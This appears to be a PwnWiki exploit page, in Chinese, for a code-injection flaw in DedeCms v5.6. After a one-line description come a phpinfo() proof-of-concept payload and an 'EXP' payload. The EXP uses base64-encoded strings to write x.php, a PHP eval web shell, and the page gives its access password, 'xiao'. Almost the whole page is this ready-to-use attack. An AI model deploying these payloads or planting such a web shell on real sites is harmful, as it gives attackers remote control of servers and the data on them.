DedeCms v5.6 嵌入惡意代碼執行漏洞

From PwnWiki
Revision as of 10:28, 10 April 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎español • ‎português • ‎中文(台灣)‎

漏洞信息

在上傳軟件的位置,對本地地址沒有進行有效的驗證,可以被惡意利用。

POC

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},

EXP

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

x.php
password:xiao
Retrieved from "https://pwnwiki.com/index.php?title=DedeCms_v5.6_嵌入惡意代碼執行漏洞&oldid=1391"